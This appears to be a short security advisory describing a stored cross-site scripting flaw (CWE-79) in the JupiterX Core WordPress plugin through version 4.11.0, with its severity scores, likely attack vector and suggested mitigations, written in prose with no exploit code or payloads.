Improper neutralization of input during web page generation permits stored cross‑site scripting in the JupiterX Core WordPress plugin. An attacker can inject malicious JavaScript that will be executed whenever a victim views a page built with the plugin, potentially exposing session cookies, defacing content, or redirecting to malicious sites. The vulnerability is a classic input validation flaw described by CWE-79.

The issue is present in the JupiterX Core plugin distributed by artbees and affects all versions from the earliest available up to and including 4.11.0.

The CVSS score of 6.5 reflects a moderate severity, while the EPSS score of less than 1% indicates a very low probability of recent exploitation. The vulnerability is not listed in the CISA KEV catalog. The likely attack vector is a stored injection through plugin input fields, though precise prerequisites are not detailed in the advisory. Attackers would need access to an administrative interface or a form that accepts unfiltered data to insert the malicious payload, after which any site visitor would be exposed to the effect. Given the moderate score and low exploitation probability, the risk remains significant for organizations that rely on the plugin and lack mitigations such as input validation or web application firewalls.